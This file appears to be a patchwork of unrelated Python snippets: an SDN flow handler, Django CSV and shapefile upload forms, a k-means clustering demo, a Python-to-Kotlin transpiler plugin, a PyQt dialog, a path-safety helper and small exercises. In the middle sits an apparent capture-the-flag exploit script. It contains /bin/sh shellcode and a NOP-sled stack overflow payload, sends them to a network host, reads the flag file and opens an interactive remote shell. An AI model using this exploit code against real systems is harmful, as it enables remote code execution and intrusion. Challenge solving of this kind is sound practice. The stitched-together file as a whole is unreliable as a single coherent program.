if msg.buffer_id != ofproto.OFP_NO_BUFFER:
self.add_flow(datapath, 1, match, actions,
idle_timeout=10, hard_timeout=10, table_id=1, buffer_id=msg.buffer_id)
else:
self.add_flow(datapath, 1, match, actions, idle_timeout=10, table_id=1,
hard_timeout=10)
data = None
if msg.buffer_id == ofproto.OFP_NO_BUFFER:
data = msg.data
if (out_port == ofproto.OFPP_FLOOD) or (msg.buffer_id == ofproto.OFP_NO_BUFFER):
out = parser.OFPPacketOut(datapath=datapath, buffer_id=msg.buffer_id,
in_port=in_port, actions=actions, data=data)
datapath.send_msg(out)
|
a=raw_input("Enter any year...\n")
a=int(a)
if a%4==0:
print "This ia a leap year"
elif a%4!=0:
print "This ia not a leap year"
else:
print "Try again" |
def classify_orfs_cmd():
# This function will parse cmd input with argparse and run classify_orfs
pass
def classify_orfs():
pass
|
from django import forms
from django.utils.translation import ugettext_lazy as _
from django.template.defaultfilters import filesizeformat
from django.conf import settings
class ImpactClassForm(forms.Form):
impact_class_file = forms.FileField(
label="",
help_text="Must be a .csv file.",
)
def clean_impact_class_file(self):
the_file = self.cleaned_data['impact_class_file']
content_type = the_file.content_type.split('/')[1]
size = the_file._size
filename = the_file.name
print 'DEBUG filename = %s' % filename
print 'DEBUG content_type = %s' % content_type
if filename.lower().endswith('.csv') or content_type in settings.CONTENT_TYPES:
if size > settings.MAX_UPLOAD_SIZE:
raise forms.ValidationError(_("File size is over %s. Current file size %s.") % (filesizeformat(settings.MAX_UPLOAD_SIZE), filesizeformat(size)))
else:
raise forms.ValidationError(_('File type is not supported.'))
return the_file
class AggregateForm(forms.Form):
aggregate_file = forms.FileField(
label="",
help_text="Must be a .csv file.",
)
def clean_aggregate_file(self):
the_file = self.cleaned_data['aggregate_file']
content_type = the_file.content_type.split('/')[1]
size = the_file._size
filename = the_file.name
print 'DEBUG filename = %s' % filename
print 'DEBUG content_type = %s' % content_type
if filename.lower().endswith('.csv') or content_type in settings.CONTENT_TYPES:
if size > settings.MAX_UPLOAD_SIZE:
raise forms.ValidationError(_("File size is over %s. Current file size %s.") % (filesizeformat(settings.MAX_UPLOAD_SIZE), filesizeformat(size)))
else:
raise forms.ValidationError(_('File type is not supported.'))
return the_file
class AssumptionsDamageForm(forms.Form):
assumptions_damage_file = forms.FileField(
label="",
help_text="Must be a .csv file.",
)
def clean_assumptions_damage_file(self):
the_file = self.cleaned_data['assumptions_damage_file']
content_type = the_file.content_type.split('/')[1]
size = the_file._size
filename = the_file.name
print 'DEBUG filename = %s' % filename
print 'DEBUG content_type = %s' % content_type
if filename.lower().endswith('.csv') or content_type in settings.CONTENT_TYPES:
if size > settings.MAX_UPLOAD_SIZE:
raise forms.ValidationError(_("File size is over %s. Current file size %s.") % (filesizeformat(settings.MAX_UPLOAD_SIZE), filesizeformat(size)))
else:
raise forms.ValidationError(_('File type is not supported.'))
return the_file
class AssumptionsLossForm(forms.Form):
assumptions_loss_file = forms.FileField(
label="",
help_text="Must be a .csv file.",
)
def clean_assumptions_loss_file(self):
the_file = self.cleaned_data['assumptions_loss_file']
content_type = the_file.content_type.split('/')[1]
size = the_file._size
filename = the_file.name
print 'DEBUG filename = %s' % filename
print 'DEBUG content_type = %s' % content_type
if filename.lower().endswith('.csv') or content_type in settings.CONTENT_TYPES:
if size > settings.MAX_UPLOAD_SIZE:
raise forms.ValidationError(_("File size is over %s. Current file size %s.") % (filesizeformat(settings.MAX_UPLOAD_SIZE), filesizeformat(size)))
else:
raise forms.ValidationError(_('File type is not supported.'))
return the_file
class AssumptionsAggregateForm(forms.Form):
assumptions_aggregate_file = forms.FileField(
label="",
help_text="Must be a .csv file.",
)
def clean_assumptions_aggregate_file(self):
the_file = self.cleaned_data['assumptions_aggregate_file']
content_type = the_file.content_type.split('/')[1]
size = the_file._size
filename = the_file.name
print 'DEBUG filename = %s' % filename
print 'DEBUG content_type = %s' % content_type
if filename.lower().endswith('.csv') or content_type in settings.CONTENT_TYPES:
if size > settings.MAX_UPLOAD_SIZE:
raise forms.ValidationError(_("File size is over %s. Current file size %s.") % (filesizeformat(settings.MAX_UPLOAD_SIZE), filesizeformat(size)))
else:
raise forms.ValidationError(_('File type is not supported.'))
return the_file
class AssumptionsInsuranceForm(forms.Form):
assumptions_insurance_file = forms.FileField(
label="",
help_text="Must be a .csv file.",
)
def clean_assumptions_insurance_file(self):
the_file = self.cleaned_data['assumptions_insurance_file']
content_type = the_file.content_type.split('/')[1]
size = the_file._size
filename = the_file.name
print 'DEBUG filename = %s' % filename
print 'DEBUG content_type = %s' % content_type
if filename.lower().endswith('.csv') or content_type in settings.CONTENT_TYPES:
if size > settings.MAX_UPLOAD_SIZE:
raise forms.ValidationError(_("File size is over %s. Current file size %s.") % (filesizeformat(settings.MAX_UPLOAD_SIZE), filesizeformat(size)))
else:
raise forms.ValidationError(_('File type is not supported.'))
return the_file
class AssumptionsInsurancePenetrationForm(forms.Form):
assumptions_insurance_penetration_file = forms.FileField(
label="",
help_text="Must be a .csv file.",
)
def clean_assumptions_insurance_penetration_file(self):
the_file = self.cleaned_data['assumptions_insurance_penetration_file']
content_type = the_file.content_type.split('/')[1]
size = the_file._size
filename = the_file.name
print 'DEBUG filename = %s' % filename
print 'DEBUG content_type = %s' % content_type
if filename.lower().endswith('.csv') or content_type in settings.CONTENT_TYPES:
if size > settings.MAX_UPLOAD_SIZE:
raise forms.ValidationError(_("File size is over %s. Current file size %s.") % (filesizeformat(settings.MAX_UPLOAD_SIZE), filesizeformat(size)))
else:
raise forms.ValidationError(_('File type is not supported.'))
return the_file
class BoundaryForm(forms.Form):
boundary_shp_file = forms.FileField(
label="",
help_text="Must be a .shp file",
)
boundary_shx_file = forms.FileField(
label="",
help_text="Must be a .shx file",
)
boundary_dbf_file = forms.FileField(
label="",
help_text="Must be a .dbf file",
)
boundary_prj_file = forms.FileField(
label="",
help_text="Must be a .prj file",
)
boundary_qpj_file = forms.FileField(
label="",
help_text="Must be a .qpj file",
)
def clean(self):
boundary_shp_file = self.cleaned_data.get('boundary_shp_file')
boundary_shx_file = self.cleaned_data.get('boundary_shx_file')
boundary_dbf_file = self.cleaned_data.get('boundary_dbf_file')
boundary_prj_file = self.cleaned_data.get('boundary_prj_file')
boundary_qpj_file = self.cleaned_data.get('boundary_qpj_file')
if (boundary_shp_file == False or boundary_shx_file == False or boundary_dbf_file == False or boundary_prj_file == False or boundary_qpj_file == False):
raise forms.ValidationError(_('Upload file not found.'))
if boundary_shp_file:
filename = boundary_shp_file.name
content_type = boundary_shp_file.content_type.split('/')[1]
size = boundary_shp_file._size
if (filename.lower().endswith('.shp') == False):
print 'DEBUG invalid file type'
raise forms.ValidationError(_('Invalid file type.'))
print 'DEBUG %s %s %s' % (filename, content_type, size)
if boundary_shx_file:
filename = boundary_shx_file.name
content_type = boundary_shx_file.content_type.split('/')[1]
size = boundary_shx_file._size
if (filename.lower().endswith('.shx') == False):
print 'DEBUG invalid file type'
raise forms.ValidationError(_('Invalid file type.'))
print 'DEBUG %s %s %s' % (filename, content_type, size)
if boundary_dbf_file:
filename = boundary_dbf_file.name
content_type = boundary_dbf_file.content_type.split('/')[1]
size = boundary_dbf_file._size
if (filename.lower().endswith('.dbf') == False):
print 'DEBUG invalid file type'
raise forms.ValidationError(_('Invalid file type.'))
print 'DEBUG %s %s %s' % (filename, content_type, size)
if boundary_prj_file:
filename = boundary_prj_file.name
content_type = boundary_prj_file.content_type.split('/')[1]
size = boundary_prj_file._size
if (filename.lower().endswith('.prj') == False):
print 'DEBUG invalid file type'
raise forms.ValidationError(_('Invalid file type.'))
print 'DEBUG %s %s %s' % (filename, content_type, size)
if boundary_qpj_file:
filename = boundary_qpj_file.name
content_type = boundary_qpj_file.content_type.split('/')[1]
size = boundary_qpj_file._size
if (filename.lower().endswith('.qpj') == False):
print 'DEBUG invalid file type'
raise forms.ValidationError(_('Invalid file type.'))
print 'DEBUG %s %s %s' % (filename, content_type, size)
class BuildingExposureForm(forms.Form):
building_exposure_shp_file = forms.FileField(
label="",
help_text="Must be a .shp file",
)
building_exposure_shx_file = forms.FileField(
label="",
help_text="Must be a .shx file",
)
building_exposure_dbf_file = forms.FileField(
label="",
help_text="Must be a .dbf file",
)
building_exposure_prj_file = forms.FileField(
label="",
help_text="Must be a .prj file",
)
building_exposure_qpj_file = forms.FileField(
label="",
help_text="Must be a .qpj file",
)
def clean(self):
building_exposure_shp_file = self.cleaned_data.get('building_exposure_shp_file')
building_exposure_shx_file = self.cleaned_data.get('building_exposure_shx_file')
building_exposure_dbf_file = self.cleaned_data.get('building_exposure_dbf_file')
building_exposure_prj_file = self.cleaned_data.get('building_exposure_prj_file')
building_exposure_qpj_file = self.cleaned_data.get('building_exposure_qpj_file')
if (building_exposure_shp_file == False or building_exposure_shx_file == False or building_exposure_dbf_file == False or building_exposure_prj_file == False or building_exposure_qpj_file == False):
raise forms.ValidationError(_('Upload file not found.'))
if building_exposure_shp_file:
filename = building_exposure_shp_file.name
content_type = building_exposure_shp_file.content_type.split('/')[1]
size = building_exposure_shp_file._size
if (filename.lower().endswith('.shp') == False):
print 'DEBUG invalid file type'
raise forms.ValidationError(_('Invalid file type.'))
print 'DEBUG %s %s %s' % (filename, content_type, size)
if building_exposure_shx_file:
filename = building_exposure_shx_file.name
content_type = building_exposure_shx_file.content_type.split('/')[1]
size = building_exposure_shx_file._size
if (filename.lower().endswith('.shx') == False):
print 'DEBUG invalid file type'
raise forms.ValidationError(_('Invalid file type.'))
print 'DEBUG %s %s %s' % (filename, content_type, size)
if building_exposure_dbf_file:
filename = building_exposure_dbf_file.name
content_type = building_exposure_dbf_file.content_type.split('/')[1]
size = building_exposure_dbf_file._size
if (filename.lower().endswith('.dbf') == False):
print 'DEBUG invalid file type'
raise forms.ValidationError(_('Invalid file type.'))
print 'DEBUG %s %s %s' % (filename, content_type, size)
if building_exposure_prj_file:
filename = building_exposure_prj_file.name
content_type = building_exposure_prj_file.content_type.split('/')[1]
size = building_exposure_prj_file._size
if (filename.lower().endswith('.prj') == False):
print 'DEBUG invalid file type'
raise forms.ValidationError(_('Invalid file type.'))
print 'DEBUG %s %s %s' % (filename, content_type, size)
if building_exposure_qpj_file:
filename = building_exposure_qpj_file.name
content_type = building_exposure_qpj_file.content_type.split('/')[1]
size = building_exposure_qpj_file._size
if (filename.lower().endswith('.qpj') == False):
print 'DEBUG invalid file type'
raise forms.ValidationError(_('Invalid file type.'))
print 'DEBUG %s %s %s' % (filename, content_type, size)
class RoadExposureForm(forms.Form):
road_exposure_shp_file = forms.FileField(
label="",
help_text="Must be a .shp file",
)
road_exposure_shx_file = forms.FileField(
label="",
help_text="Must be a .shx file",
)
road_exposure_dbf_file = forms.FileField(
label="",
help_text="Must be a .dbf file",
)
road_exposure_prj_file = forms.FileField(
label="",
help_text="Must be a .prj file",
)
road_exposure_qpj_file = forms.FileField(
label="",
help_text="Must be a .qpj file",
)
def clean(self):
road_exposure_shp_file = self.cleaned_data.get('road_exposure_shp_file')
road_exposure_shx_file = self.cleaned_data.get('road_exposure_shx_file')
road_exposure_dbf_file = self.cleaned_data.get('road_exposure_dbf_file')
road_exposure_prj_file = self.cleaned_data.get('road_exposure_prj_file')
road_exposure_qpj_file = self.cleaned_data.get('road_exposure_qpj_file')
if (road_exposure_shp_file == False or road_exposure_shx_file == False or road_exposure_dbf_file == False or road_exposure_prj_file == False or road_exposure_qpj_file == False):
raise forms.ValidationError(_('Upload file not found.'))
if road_exposure_shp_file:
filename = road_exposure_shp_file.name
content_type = road_exposure_shp_file.content_type.split('/')[1]
size = road_exposure_shp_file._size
if (filename.lower().endswith('.shp') == False):
print 'DEBUG invalid file type'
raise forms.ValidationError(_('Invalid file type.'))
print 'DEBUG %s %s %s' % (filename, content_type, size)
if road_exposure_shx_file:
filename = road_exposure_shx_file.name
content_type = road_exposure_shx_file.content_type.split('/')[1]
size = road_exposure_shx_file._size
if (filename.lower().endswith('.shx') == False):
print 'DEBUG invalid file type'
raise forms.ValidationError(_('Invalid file type.'))
print 'DEBUG %s %s %s' % (filename, content_type, size)
if road_exposure_dbf_file:
filename = road_exposure_dbf_file.name
content_type = road_exposure_dbf_file.content_type.split('/')[1]
size = road_exposure_dbf_file._size
if (filename.lower().endswith('.dbf') == False):
print 'DEBUG invalid file type'
raise forms.ValidationError(_('Invalid file type.'))
print 'DEBUG %s %s %s' % (filename, content_type, size)
if road_exposure_prj_file:
filename = road_exposure_prj_file.name
content_type = road_exposure_prj_file.content_type.split('/')[1]
size = road_exposure_prj_file._size
if (filename.lower().endswith('.prj') == False):
print 'DEBUG invalid file type'
raise forms.ValidationError(_('Invalid file type.'))
print 'DEBUG %s %s %s' % (filename, content_type, size)
if road_exposure_qpj_file:
filename = road_exposure_qpj_file.name
content_type = road_exposure_qpj_file.content_type.split('/')[1]
size = road_exposure_qpj_file._size
if (filename.lower().endswith('.qpj') == False):
print 'DEBUG invalid file type'
raise forms.ValidationError(_('Invalid file type.'))
print 'DEBUG %s %s %s' % (filename, content_type, size)
class GlobalConfigForm(forms.Form):
global_config_file = forms.FileField(
label="",
help_text="Must be a .cfg file.",
)
def clean_global_config_file(self):
the_file = self.cleaned_data['global_config_file']
if (the_file == False):
raise forms.ValidationError(_('Upload file not found.'))
else:
filename = the_file.name
content_type = the_file.content_type.split('/')[1]
size = the_file._size
if (filename.lower().endswith('.cfg') == False):
print 'DEBUG invalid file type'
raise forms.ValidationError(_('Invalid file type.'))
print 'DEBUG %s %s %s' % (filename, content_type, size)
return the_file |
#!/usr/bin/env python3
"""
diff -u neophyte1.jav neophyte2.jav
--- neophyte1.jav 2016-08-05 19:09:09.935916641 -0700
+++ neophyte2.jav 2016-08-05 19:39:34.523799711 -0700
@@ -163,12 +163,12 @@
vulnerable:
804852f: PUSH EBP
8048530: MOV EBP, ESP ; EBP = ESP;
- 8048532: SUB ESP, 0x3db8 ; ESP -= 0x3db8;
+ 8048532: SUB ESP, 0xea8 ; ESP -= 0xea8;
8048538: MOV EAX, [0x804a040] ; EAX = [0x804a040];
804853d: SUB ESP, 0x4 ; ESP -= 0x4;
8048540: PUSH EAX
- 8048541: PUSH DWORD 0x41a4
- 8048546: LEA EAX, [EBP-0x3dac]
+ 8048541: PUSH DWORD 0x129c
+ 8048546: LEA EAX, [EBP-0xea4]
804854c: PUSH EAX
804854d: CALL 80483d0 <fgets>
8048552: ADD ESP, 0x10 ; ESP += 0x10;
@@ -201,8 +201,8 @@
80485a0: ADD ESP, 0x10 ; ESP += 0x10;
80485a3: CALL 80483c0 <getchar>
80485a8: MOV [EBP-0x9], AL ; [EBP-0x9] = AL;
- 80485ab: CMP BYTE [EBP-0x9], 0x6b ;
- 80485af: JNZ 0x80485c8 ; if(BYTE [EBP-0x9] == 0x6b) {
+ 80485ab: CMP BYTE [EBP-0x9], 0x75 ;
+ 80485af: JNZ 0x80485c8 ; if(BYTE [EBP-0x9] == 0x75) {
80485b1: SUB ESP, 0xc ; ESP -= 0xc;
80485b4: PUSH DWORD 0x8048670 ; 'good gatekeeper'
80485b9: CALL 80483f0 <puts>
for i in $(seq 1 200); do echo 'new'; python3 neophyte1.py; done >gg3.txt
grep -A2 success gg3.txt
"""
import struct
import socket
import telnetlib
HOST, PORT = '172.31.1.46', 1622
# From HBW's exploit, I hope it works.
sc = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
varcmp = b'k'
#subesp = 0x3db8
sublea = 0x3dac
stackptr = 0xffb107f0
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST,PORT))
q = s.recv(8000)
q1 = q
#if b'\x7fELF' not in q:
while len(q) < 7747:
print('fail1', q1)
if q1 == b'': exit(1)
q1 = s.recv(8000)
q += q1
#end if
elf = q[q.index(b'\x7fELF'):]
varcmp = elf[0x5ae:0x5af]
#subesp = struct.unpack('<H', elf[0x534:0x536])[0]
sublea = 0x10000 - struct.unpack('<H', elf[0x548:0x54a])[0]
#print('varcmp', varcmp, 'subesp', hex(subesp))
print('varcmp', varcmp, 'sublea', hex(sublea))
# Works every time
addr = 0x80485cb
# Works 1 in 150 times.
addr = 0xffff948c
#a = varcmp + (b'\x90'*(subesp-8-len(sc))) + sc + struct.pack('<I', stackptr-subesp) + b'\n'
#a = varcmp + (b'\x90'*(subesp-8-len(sc))) + sc + struct.pack('<I', addr) + b'\n'
a = varcmp + (b'\x90'*(sublea+4-len(sc)-50)) + sc + (b'\x90'*50) + struct.pack('<I', addr) + b'\n'
s.send(a)
print('resp', s.recv(1024))
s.send(b'cat /home/challenge/flag\n')
s.send(b'pwd\n')
print('resp success', s.recv(1024))
print("shell:")
ts = telnetlib.Telnet()
ts.sock = s
ts.interact()
s.close()
|
import numpy as np
import pandas as pd
from sklearn.cluster import KMeans
import matplotlib.pyplot as plt
from copy import deepcopy
# Reading csv dataset as it does not have header, and separated by names
wine = pd.read_csv("wine.data", names = ["Class",
"Alcohol",
"Malic acid",
"Ash",
"Alcalinity of ash",
"Magnesium",
"Total phenols",
"Flavanoids",
"Nonflavanoid phenols",
"Proanthocyanins",
"Color intensity",
"Hue",
"OD280/OD315 of diluted wines",
"Proline"])
wine.Class = wine.Class - 1
# K-means from scratch
X = wine.iloc[:, [12, 1]].values
data = pd.DataFrame(X)
val1 = data[0].values
val2 = data[1].values
#Euclidean Distance Function
def dist(x, y, ax=1):
return np.linalg.norm(x - y, axis=ax)
# Number of clusters
k = 3
# Creating random centroids
# random x coordinates of centroids
x_coor = np.random.randint(0, np.max(X)-7, size=k)
# random y coordinates of random centroids
y_coor = np.random.randint(0, np.max(X)-7, size=k)
# Centroids
_centroid = np.array(list(zip(x_coor, y_coor)), dtype=np.float32)
print("Initial Centroids")
print(_centroid)
# Plotting actual values and the random centroids
plt.scatter(val1, val2, c='#050505', s=7)
plt.scatter(x_coor, y_coor, marker='x', s=200, c='g')
# To store the old value of centroids when it updates
my_centroid = np.zeros(_centroid.shape)
clusters = np.zeros(len(X))
# Error function - Distance between updated and old centroids
error = dist(_centroid, my_centroid, None)
# Loop will run till the error becomes zero
while error != 0:
# Assigning each value to its closest cluster
for i in range(len(X)):
distances = dist(X[i], _centroid)
cluster = np.argmin(distances)
clusters[i] = cluster
# Storing the old centroid values
C_old = deepcopy(_centroid)
# Finding the new centroids by taking the average value
for i in range(k):
points = [X[j] for j in range(len(X)) if clusters[j] == i]
_centroid[i] = np.mean(points, axis=0)
error = dist(_centroid, my_centroid, None)
colors = ['red','blue','green']
fig, ax = plt.subplots()
for i in range(k):
points = np.array([X[j] for j in range(len(X)) if clusters[j] == i])
ax.scatter(points[:, 0], points[:, 1], s=7, c=colors[i])
ax.scatter(_centroid[:, 0], _centroid[:, 1], marker='*', s=200, c='#050505')
# K means with scikit-learn libraries
from sklearn.cluster import KMeans
kmeans = KMeans(n_clusters=3)
kmeans.fit(X)
y_kmeans = kmeans.predict(X)
plt.scatter(X[:, 0], X[:, 1], c=y_kmeans, s=50, cmap='viridis')
centers = kmeans.cluster_centers_
plt.scatter(centers[:, 0], centers[:, 1], c='black', s=200, alpha=0.5);
|
import io
import os
import ast
import functools
import re
import sys
import textwrap
from tempfile import NamedTemporaryFile
from typing import Callable, Dict, List, Tuple, Union
try:
from argparse_dataclass import dataclass as ap_dataclass
from argparse_dataclass import ArgumentParser
except:
ArgumentParser = "ArgumentParser"
ap_dataclass = "ap_dataclass"
class KotlinTranspilerPlugins:
def visit_argparse_dataclass(self, node):
fields = []
for (
declaration,
typename_with_default,
) in node.declarations_with_defaults.items():
typename, default_value = typename_with_default
if typename == None:
return None
if default_value is not None and typename != "bool":
default_value = self.visit(default_value)
default_value = f', default_value = "{default_value}"'
else:
default_value = ""
fields.append(
f"#[structopt(short, long{default_value})]\npub {declaration}: {typename},"
)
fields = "\n".join(fields)
self._usings.add("structopt::StructOpt")
clsdef = "\n" + textwrap.dedent(
f"""\
#[derive(Debug, StructOpt)]
#[structopt(name = "{self._module}", about = "Placeholder")]
struct {node.name} {{
{fields}
}}
"""
)
return clsdef
def visit_open(self, node, vargs):
self._usings.add("std::fs::File")
if len(vargs) > 1:
self._usings.add("std::fs::OpenOptions")
mode = vargs[1]
opts = "OpenOptions::new()"
is_binary = "b" in mode
for c in mode:
if c == "w":
if not is_binary:
self._usings.add("pylib::FileWriteString")
opts += ".write(true)"
if c == "r":
if not is_binary:
self._usings.add("pylib::FileReadString")
opts += ".read(true)"
if c == "a":
opts += ".append(true)"
if c == "+":
opts += ".read(true).write(true)"
node.result_type = True
return f"{opts}.open({vargs[0]})"
node.result_type = True
return f"File::open({vargs[0]})"
def visit_named_temp_file(self, node, vargs):
node.annotation = ast.Name(id="tempfile._TemporaryFileWrapper")
node.result_type = True
return "NamedTempFile::new()"
def visit_textio_read(self, node, vargs):
# TODO
return None
def visit_textio_write(self, node, vargs):
# TODO
return None
def visit_ap_dataclass(self, cls):
# Do whatever transformation the decorator does to cls here
return cls
def visit_range(self, node, vargs: List[str]) -> str:
if len(node.args) == 1:
return "(0..{}-1)".format(vargs[0])
elif len(node.args) == 2:
return "({}..{}-1)".format(vargs[0], vargs[1])
elif len(node.args) == 3:
return "({}..{}-1 step {})".format(vargs[0], vargs[1], vargs[2])
raise Exception(
"encountered range() call with unknown parameters: range({})".format(vargs)
)
def visit_print(self, node, vargs: List[str]) -> str:
def _format(arg):
if arg.isdigit():
return arg
if re.match(r"'.*'", arg) or re.match(r'".*"', arg):
return arg[1:-1]
else:
return f"${arg}"
vargs_str = " ".join([f"{_format(arg)}" for arg in vargs])
return f'println("{vargs_str}")'
def visit_min_max(self, node, vargs, is_max: bool) -> str:
min_max = "max" if is_max else "min"
self._usings.add(f"kotlin.math.{min_max}")
self._typename_from_annotation(node.args[0])
if hasattr(node.args[0], "container_type"):
return f"maxOf({vargs[0]})"
else:
all_vargs = ", ".join(vargs)
return f"{min_max}({all_vargs})"
@staticmethod
def visit_cast(node, vargs, cast_to: str) -> str:
if not vargs:
if cast_to == "Double":
return "0.0"
return f"{vargs[0]}.to{cast_to}()"
def visit_floor(self, node, vargs) -> str:
self._usings.add("kotlin.math.floor")
return f"floor({vargs[0]}).toInt()"
# small one liners are inlined here as lambdas
SMALL_DISPATCH_MAP = {
"str": lambda n, vargs: f"{vargs[0]}.toString()" if vargs else '""',
# TODO: strings use .length
"len": lambda n, vargs: f"{vargs[0]}.size",
"int": lambda n, vargs: f"{vargs[0]}.toInt()" if vargs else "0",
"float": functools.partial(KotlinTranspilerPlugins.visit_cast, cast_to="Double"),
"bool": lambda n, vargs: f"({vargs[0]} != 0)" if vargs else "false",
"reversed": lambda n, vargs: f"{vargs[0]}.reversed()",
}
SMALL_USINGS_MAP: Dict[str, str] = {}
DISPATCH_MAP = {
"max": functools.partial(KotlinTranspilerPlugins.visit_min_max, is_max=True),
"min": functools.partial(KotlinTranspilerPlugins.visit_min_max, is_max=False),
"range": KotlinTranspilerPlugins.visit_range,
"xrange": KotlinTranspilerPlugins.visit_range,
"print": KotlinTranspilerPlugins.visit_print,
"floor": KotlinTranspilerPlugins.visit_floor,
}
MODULE_DISPATCH_TABLE: Dict[str, str] = {}
DECORATOR_DISPATCH_TABLE = {ap_dataclass: KotlinTranspilerPlugins.visit_ap_dataclass}
CLASS_DISPATCH_TABLE = {ap_dataclass: KotlinTranspilerPlugins.visit_argparse_dataclass}
ATTR_DISPATCH_TABLE = {
"temp_file.name": lambda self, node, value, attr: f"{value}.path()",
}
FuncType = Union[Callable, str]
FUNC_DISPATCH_TABLE: Dict[FuncType, Tuple[Callable, bool]] = {
# Uncomment after upstream uploads a new version
# ArgumentParser.parse_args: lambda node: "Opts::parse_args()",
# HACKs: remove all string based dispatch here, once we replace them with type based
"parse_args": (lambda self, node, vargs: "::from_args()", False),
"f.read": (lambda self, node, vargs: "f.read_string()", True),
"f.write": (lambda self, node, vargs: f"f.write_string({vargs[0]})", True),
"f.close": (lambda self, node, vargs: "drop(f)", False),
open: (KotlinTranspilerPlugins.visit_open, True),
NamedTemporaryFile: (KotlinTranspilerPlugins.visit_named_temp_file, True),
io.TextIOWrapper.read: (KotlinTranspilerPlugins.visit_textio_read, True),
io.TextIOWrapper.read: (KotlinTranspilerPlugins.visit_textio_write, True),
os.unlink: (lambda self, node, vargs: f"std::fs::remove_file({vargs[0]})", True),
sys.exit: (
lambda self, node, vargs: f"kotlin.system.exitProcess({vargs[0]})",
True,
),
}
|
import json
# Read parameter file
with open('service/parameters.json', 'r') as f:
parameters = json.load(f)
# Tolerance is equals to 1 - similarity threshold
parameters['tolerance'] = 1 - float(parameters['sim_threshold'])
parameters['FEATURE_DIMENSION'] = 128 |
# -*- coding: utf-8 -*-
from datetime import datetime
from pathlib import Path
from typing import List, Any
from PyQt5.QtWidgets import QFormLayout, QLineEdit, QDateTimeEdit, QWidget
from PyQt5.QtWidgets import QDialog
from dgp.core.oid import OID
from dgp.core.controllers.controller_interfaces import IAirborneController
from .dialog_mixins import FormValidator
from ..ui.project_properties_dialog import Ui_ProjectPropertiesDialog
class ProjectPropertiesDialog(QDialog, Ui_ProjectPropertiesDialog, FormValidator):
def __init__(self, project: IAirborneController, parent=None):
super().__init__(parent=parent)
self.setupUi(self)
self._project = project
self.setWindowTitle(self._project.get_attr('name'))
self._updates = {}
self._field_map = {
str: (lambda v: v.strip(), QLineEdit),
Path: (lambda v: str(v.resolve()), QLineEdit),
datetime: (lambda v: v, QDateTimeEdit),
OID: (lambda v: v.base_uuid, QLineEdit)
}
self._setup_properties_tab()
def _get_field_attr(self, _type: Any):
try:
attrs = self._field_map[_type]
except KeyError:
for key in self._field_map.keys():
if issubclass(_type, key):
return self._field_map[key]
return None
return attrs
def _setup_properties_tab(self):
for key in self._project.fields:
enabled = self._project.writeable(key)
validator = self._project.validator(key)
raw_value = self._project.get_attr(key)
data_type = type(raw_value)
value_lambda, widget_type = self._get_field_attr(data_type)
widget: QWidget = widget_type(value_lambda(raw_value))
widget.setEnabled(enabled)
if validator:
widget.setValidator(validator)
self.qfl_properties.addRow(str(key.strip('_')).capitalize(), widget)
if enabled:
self._updates[key] = data_type, widget
@property
def validation_targets(self) -> List[QFormLayout]:
return [self.qfl_properties]
@property
def validation_error(self):
return self.ql_validation_err
def accept(self):
print("Updating values for fields:")
for key in self._updates:
print(key)
try:
self._project.set_attr(key, self._updates[key][1].text())
except AttributeError:
print("Can't update key: {}".format(key))
if not self.validate():
print("A value is invalid")
return
super().accept()
|
from django.contrib import admin
from Home.models import Workers, Employer
# Register your models here.
admin.site.register(Workers)
admin.site.register(Employer)
|
# _*_ coding:utf-8 _*_
from __future__ import unicode_literals
from django.apps import AppConfig
class CompanysConfig(AppConfig):
name = 'companys'
verbose_name = u'企业'
|
import numpy as np
class Distribution(object):
'''
Base class for distribution. Useful for estimating and sampling
initial state distributions
'''
def fit(data):
raise NotImplementedError
def sample(self, n_samples=1):
raise NotImplementedError
@property
def dim(self):
return self.__dim
@dim.setter
def dim(self, dim):
self.__dim = dim
class Delta(Distribution):
def __init__(self, a):
self.a = a
def sample(self, n_samples=1):
return np.tile(self.a, (n_samples, 1))
class Gaussian(Distribution):
def __init__(self, mean, cov):
self.mean = np.array(mean)
self.cov = np.array(cov)
self.dim = self.mean.size
@property
def cov(self):
return self.__cov
@cov.setter
def cov(self, cov):
self.__cov = cov
if cov is not None:
assert cov.shape[0] == cov.shape[1]
self.cov_chol = np.linalg.cholesky(cov)
def sample(self, n_samples=1):
return self.mean + np.random.randn(
n_samples, self.mean.size).dot(self.cov_chol)
def __call__(self, mean=None, cov=None, n_samples=1):
if mean is not None:
self.mean = mean
if cov is not None:
self.cov = cov
return self.sample(n_samples)
|
"""
este eh um client, para funcionar deve rodar:
python api-server-get.py runserver [enter]
"""
import requests
endpoint = "http://127.0.0.1:5000"
rq = requests.get(endpoint)
print("status-code:")
print(rq.status_code)
print("headers:")
print(rq.headers['content-type'])
print("text:")
print(rq.text)
print("json:")
print(rq.json()) |
""" Keep subpath handling consistent.
As files should not be written outside of CWD, this is a security issue.
Paths may be provided as absolute or relative, and they may be manipulated
inside the storage files. So the check should happen every time a path is
actually used.
"""
import os
import pathlib
from typing import TypeVar
AnyPath = TypeVar("AnyPath", str, pathlib.Path)
class SubPath:
def __init__(self, relative_path: AnyPath):
""" Wrapper for pathlib.Path that only allows relative paths without .. elements. """
self.relative_path = self.to_path(relative_path)
if self.relative_path.is_absolute():
raise ValueError("only relative paths allowed here! (%s)" % relative_path)
if '..' in self.relative_path.parts:
raise ValueError("'..' not allowed in SubPath! (%s)" % relative_path)
def __str__(self) -> str:
""" relative string representation. """
return str(self.relative_path)
@staticmethod
def to_path(path: AnyPath) -> pathlib.Path:
""" Pure conversion of string or Path to Path. """
print(path)
if not isinstance(path, pathlib.Path):
return pathlib.Path(path)
return path
def absolute_path(self, parent: AnyPath) -> pathlib.Path:
""" Transform to absolute. """
return self.to_path(parent) / self.relative_path
@classmethod
def from_any_path(cls, path: AnyPath, parent: AnyPath) -> "SubPath":
""" Create from absolute or relative path. """
abs_path = cls.to_path(os.path.abspath(path))
abs_parent = cls.to_path(os.path.abspath(parent))
return cls(abs_path.relative_to(abs_parent))
@property
def slashed_string(self) -> str:
""" '/'-separated string representation.
Intended for platform-independent storage.
"""
return '/'.join(self.relative_path.parts)
|
import random
def randint(a,b):
return random.randint(a,b)
def dmg(STR,DEF):
value = random.randint(80,120)
dmg = ((value*STR) - (DEF*50))/100
if dmg <= 0:
dmg = 0
return dmg
|
#Brute Force Apporach for Maximum Subarray
def maxSubOn3(arr):
maximum=0
for i in range(n):
for j in range(i,n):
subsum=0
for k in range(i,j):
subsum+=arr[k];
maximum=max(subsum,maximum)
